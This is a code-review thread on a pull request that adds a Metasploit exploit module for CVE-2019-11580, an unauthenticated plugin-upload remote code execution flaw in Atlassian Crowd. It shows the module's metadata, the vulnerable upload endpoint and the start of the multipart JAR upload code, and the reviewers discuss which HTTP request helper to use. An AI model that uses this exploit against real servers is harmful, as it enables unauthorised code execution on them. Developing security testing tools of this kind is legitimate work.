modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb

```diff
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE',
+        'Description' => %q{
+          This module can be used to upload a plugin on Atlassian Cloud via
+          the pdkinstall development plugin as an unauthenticated attacker.
+          The payload is uploaded as a JAR archive containing a servlet using
+          a POST request to /crowd/admin/uploadplugin.action. The check command will
+          check that the /crowd/admin/uploadplugin.action page exists and that it
+          responds appropriately to determine if the target is vulnerable or not.
+        },
+        'Author' => [
+          'Paul', # Vulnerability discovery
+          'Corben Leo', # PoC and Vulnerability Writeup. @hacker_ on Twitter.
+          'Grant Willcox' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE', '2019-11580'],
+            ['URL', 'https://jira.atlassian.com/browse/CWD-5388'],
+            ['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'],
+            ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
+          ],
+        'Platform' => %w[java],
+        'Arch' => ARCH_JAVA,
+        'Notes' =>
+          {
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'Stability' => [ CRASH_SAFE ]
+          },
+        'Targets' =>
+          [
+            [
+              'Java Universal',
+              {
+                'Arch' => ARCH_JAVA,
+                'Platform' => 'java'
+              }
+            ]
+          ],
+        'DisclosureDate' => '2019-05-22'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8095),
+        OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/']),
+        OptInt.new('REQUESTTIMEOUT', [true, 'Max time to wait for requests to time out', 25])
+      ]
+    )
+  end
+
+  def upload_plugin(content)
+    data = Rex::MIME::Message.new
+    data.add_part(content, nil, 'binary', "form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.jar\"")
+    send_request_raw({
```

Comment:
```suggestion
    send_request_cgi({
```

Reply:
I think I may have done this as the original request when using `send_request_cgi` sent some extra headers that were messing things up and causing the file upload to fail. I'll try this again but no guarentees.

Reply:
For consistency, and `send_request_cgi` is generally desirable unless `send_request_raw` is required.

Reply:
Nm, it works fine, I'll update this along with the other code 😄

Reply:
Nm, it works fine, I'll update this along with the other code 😄

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/15501/commits/ade653f0bf33160c80bc7bef67f5e9af2276af7c